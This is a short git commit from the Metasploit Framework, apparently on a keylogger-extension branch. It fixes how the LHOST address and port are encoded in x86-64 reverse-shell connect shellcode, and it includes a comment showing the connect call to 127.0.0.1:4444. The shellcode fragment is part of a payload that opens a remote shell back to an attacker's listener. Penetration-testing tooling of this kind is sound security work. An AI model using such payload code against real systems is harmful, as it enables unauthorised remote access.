fix LHOST

MS-2855/keylogger-mettle-extension
Tim W 2018-01-10 11:48:41 +08:00
parent e225e29add
commit cf893c2962
1 changed files with 1 additions and 2 deletions

View File

@ -73,8 +73,7 @@ module MetasploitModule
; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16); ; connect (sockfd, {AF_INET,4444,127.0.0.1}, 16);
mov rdi, rax mov rdi, rax
mov rax, ~0x#{encoded_host}#{encoded_port} mov rax, 0x#{encoded_host}#{encoded_port}
not rax
push rax push rax
push rsp push rsp
pop rsi pop rsi